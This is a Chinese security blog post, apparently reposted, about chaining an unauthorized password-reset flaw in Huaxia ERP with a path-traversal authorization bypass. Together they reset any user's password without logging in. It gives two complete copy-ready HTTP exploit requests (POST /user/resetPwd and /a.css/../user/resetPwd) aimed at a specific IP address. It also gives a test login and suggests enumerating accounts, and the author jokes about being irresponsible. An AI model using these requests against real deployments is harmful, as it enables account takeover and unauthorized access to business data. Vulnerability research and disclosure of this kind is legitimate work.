华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

admin
admin
admin
138985
文章
114
评论
2021年10月12日02:18:43评论417 views字数 2075阅读6分55秒阅读模式

又是这个测试靶场。。。

靶场地址

http://47.116.69.14

账户密码

jsh

123456

1、描述


华夏ERP基于SpringBoot框架和SaaS模式,可以算作是国内人气比较高的一款ERP项目,但经过源码审计发现其存在多个漏洞,本篇为越权任意用户密码重置漏洞,结合上一篇的授权绕过漏洞再打一个组合拳,前台任意用户密码重置!







2、影响范围



华夏ERP







3、漏洞复现


从开源项目本地搭建来进行审计,源码下载地址:

百度网盘 https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw  提取码:814g







一、越权任意密码重置漏洞

漏洞简单描述:

该项目利用id重置相应用户密码,且未做权限划分, 重置后为123456,漏洞代码位置为:
src/main/java/com/jsh/erp/controller/UserController.java

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置


测试漏洞的时候,我们先使用测试账号登录进后台,然后获取到所有用户list

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

发现主管大大的ID为63,那我们就可以把他的密码重置掉:

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

知道你们懒得敲,复制一下:

POST /user/resetPwd HTTP/1.1Host: 47.116.69.14Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45X-Requested-With: XMLHttpRequestReferer: http://47.116.69.14/pages/reports/account_report.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5Cookie: JSESSIONID=D735ED1C9E200438866A79896DF1F77D;Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 5
id=63

从上面的源码中可以看到,重置后的默认密码为123456


二、组合拳-前台任意用户密码重置漏洞

那么实战中怎么可能有测试账号给你登录后台呢,弱口令?爆破?只不过很少时候是yyds,那么我们就可以结合上一篇中的授权绕过漏洞打个组合拳。

我们从前台随便重置一个ID的密码:

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

POST /a.css/../user/resetPwd HTTP/1.1Host: 47.116.69.14Content-Length: 8Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.60Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://47.116.69.14Referer: http://47.116.69.14/pages/manage/user.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5Connection: close
id=90824

这时候肯定有人要问了,密码是给重置成123456了,那怎么知道账户是什么??

(⊙o⊙)…阿这,枚举一下子?然后全试一遍?哈哈哈不管了,反正不是我实战,就是这么不负责~

最后再给大家介绍一下漏洞库,地址:wiki.xypbk.com

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

本站暂不开源,因为想控制影响范围,若因某些人乱搞,造成了严重后果,本站将即刻关闭。


漏洞库内容来源于互联网&&零组文库&&peiqi文库&&自挖漏洞&&乐于分享的师傅供大家方便检索,绝无任何利益


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


若有愿意分享自挖漏洞的佬师傅请公众号后台留言,本站将把您供上,并在此署名,天天烧香那种!


华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

扫取二维码获取

更多精彩

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

Qingy之安全

华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置



本文始发于微信公众号(Qingy之安全):华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月12日02:18:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   华夏ERP组合拳之越权任意用户密码重置+未授权访问=前台任意用户密码重置https://cn-sec.com/archives/386252.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息